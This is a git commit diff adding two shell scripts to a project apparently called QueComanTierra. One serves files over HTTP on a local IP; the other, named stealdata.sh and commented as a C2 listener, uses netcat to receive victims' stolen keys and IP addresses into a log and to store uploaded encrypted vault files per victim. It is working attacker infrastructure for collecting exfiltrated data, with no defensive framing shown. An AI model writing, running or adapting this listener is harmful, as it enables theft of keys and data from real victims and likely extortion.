movidos scripts a scripts/
This commit is contained in:
3
QueComanTierra/scripts/getkeys.sh
Executable file
3
QueComanTierra/scripts/getkeys.sh
Executable file
@@ -0,0 +1,3 @@
|
||||
#!/bin/bash
|
||||
|
||||
python3 -m http.server -b 192.168.1.5 9090
|
||||
97
QueComanTierra/scripts/stealdata.sh
Executable file
97
QueComanTierra/scripts/stealdata.sh
Executable file
@@ -0,0 +1,97 @@
|
||||
#!/bin/bash
|
||||
# C2 listener:
|
||||
# GET /?k=KEY&v=VICTIM_IP -> loggea clave
|
||||
# POST /vault/VICTIM_IP -> guarda .vault.enc en vaults/VICTIM_IP/
|
||||
|
||||
PORT=${1:-9090}
|
||||
LOG="stolen_keys.log"
|
||||
VAULTS_DIR="vaults"
|
||||
HTTP_200=$'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n'
|
||||
|
||||
mkdir -p "$VAULTS_DIR"
|
||||
|
||||
handle_get() {
|
||||
local url="$1"
|
||||
local key victim ts
|
||||
|
||||
key=$(grep -oP '(?<=k=)[^& ]+' <<< "$url")
|
||||
victim=$(grep -oP '(?<=v=)[^& ]+' <<< "$url")
|
||||
[[ -z "$key" ]] && return
|
||||
|
||||
ts=$(date '+%Y-%m-%d %H:%M:%S')
|
||||
echo "[+] $ts victim=$victim key=$key" | tee -a "$LOG"
|
||||
}
|
||||
|
||||
handle_post() {
|
||||
local tmpfile="$1" url="$2"
|
||||
local victim victim_dir offset body_start size ts
|
||||
|
||||
victim=$(grep -oP '(?<=/vault/)[^/ ]+' <<< "$url")
|
||||
[[ -z "$victim" ]] && victim="unknown"
|
||||
|
||||
victim_dir="$VAULTS_DIR/$victim"
|
||||
mkdir -p "$victim_dir"
|
||||
|
||||
# Busca el byte-offset del separador \r\n\r\n (fin de headers HTTP)
|
||||
offset=$(grep -boa $'\r\n\r\n' "$tmpfile" 2>/dev/null | head -1 | cut -d: -f1)
|
||||
if [[ -z "$offset" ]]; then
|
||||
echo "[-] separador no encontrado en request de $victim" >&2
|
||||
return
|
||||
fi
|
||||
|
||||
body_start=$(( offset + 4 ))
|
||||
dd if="$tmpfile" bs=1 skip="$body_start" of="$victim_dir/.vault.enc" 2>/dev/null
|
||||
|
||||
size=$(stat -c%s "$victim_dir/.vault.enc" 2>/dev/null || echo "?")
|
||||
ts=$(date '+%Y-%m-%d %H:%M:%S')
|
||||
echo "[+] $ts vault=$victim_dir/.vault.enc size=${size}B" | tee -a "$LOG"
|
||||
}
|
||||
|
||||
handle_connection() {
|
||||
local tmpfile="$1"
|
||||
local request_line method url
|
||||
|
||||
request_line=$(head -1 "$tmpfile")
|
||||
method=$(awk '{print $1}' <<< "$request_line" | tr -d '\r')
|
||||
url=$(awk '{print $2}' <<< "$request_line")
|
||||
|
||||
case "$method" in
|
||||
GET) handle_get "$url" ;;
|
||||
POST) handle_post "$tmpfile" "$url" ;;
|
||||
*) echo "[-] metodo desconocido: $method" >&2 ;;
|
||||
esac
|
||||
}
|
||||
|
||||
key_listener() {
|
||||
local tmpfile
|
||||
tmpfile=$(mktemp)
|
||||
trap "rm -f $tmpfile" EXIT
|
||||
|
||||
echo "[*] Keys en :9090"
|
||||
while true; do
|
||||
printf '%s' "$HTTP_200" | nc -nlvp 9090 > "$tmpfile" 2>/dev/null
|
||||
handle_get "$(awk 'NR==1{print $2}' "$tmpfile")"
|
||||
done
|
||||
}
|
||||
|
||||
vault_listener() {
|
||||
local tmpfile
|
||||
tmpfile=$(mktemp)
|
||||
trap "rm -f $tmpfile" EXIT
|
||||
|
||||
echo "[*] Vaults en :9091"
|
||||
while true; do
|
||||
printf '%s' "$HTTP_200" | nc -nlvp 9091 > "$tmpfile" 2>/dev/null
|
||||
local url
|
||||
url=$(awk 'NR==1{print $2}' "$tmpfile")
|
||||
handle_post "$tmpfile" "$url"
|
||||
done
|
||||
}
|
||||
|
||||
main() {
|
||||
echo "[*] C2 iniciado. Logs en $LOG, vaults en $VAULTS_DIR/"
|
||||
key_listener &
|
||||
vault_listener
|
||||
}
|
||||
|
||||
main
|
||||
Reference in New Issue
Block a user